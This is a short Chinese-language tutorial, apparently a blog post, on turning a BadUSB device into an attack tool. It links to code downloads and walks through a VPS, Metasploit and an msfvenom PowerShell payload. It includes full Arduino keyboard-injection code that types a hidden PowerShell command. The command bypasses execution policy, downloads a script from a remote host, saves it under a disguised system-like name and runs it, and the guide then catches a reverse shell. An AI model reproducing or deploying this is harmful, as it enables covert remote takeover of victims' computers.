http://badusb.pw/# 官网+代码
badusb在淘宝上有卖的
买一个vps服务器,搭建一个FQ的shadowsocks,安装上metassplote,拥有一个外网IP
Arduino代码下载点击下载解压密码:159@159
Digispark代码下载点击下载解压密码:159@159
解压出来,根据版本不同使用不同的代码,里面还有许多有待发掘的。。。
在badusb上代码烧写进U盘,使用msfvenom生成一个ps1的文件,上传到服务器上。
#include <Keyboard.h> void setup() { Keyboard.begin(); delay(5000); Keyboard.press(KEY_LEFT_GUI); delay(500); Keyboard.press('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("POWERSHELL -NOP -eXECUTIONpOLICY bYPASS -W HIDDEN -C \"(nEW-oBJECT nET.wEBcLIENT).dOWNLOADfILE('HTTP://x.x.x.x/xxx.PS1','C:\\USERS\\PUBLIC\\sYSTEMnETWORKsERVICE.PS1')\";C:\\USERS\\PUBLIC\\sYSTEMnETWORKsERVICE.PS1;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() { }
烧写进U盘。
在vps的metasploite上设置监听,插入U盘,反弹shell。。。。
参考资料
- http://www.freebuf.com/news/46291.html
- http://www.freebuf.com/terminal/140619.html
- http://www.freebuf.com/geek/127601.html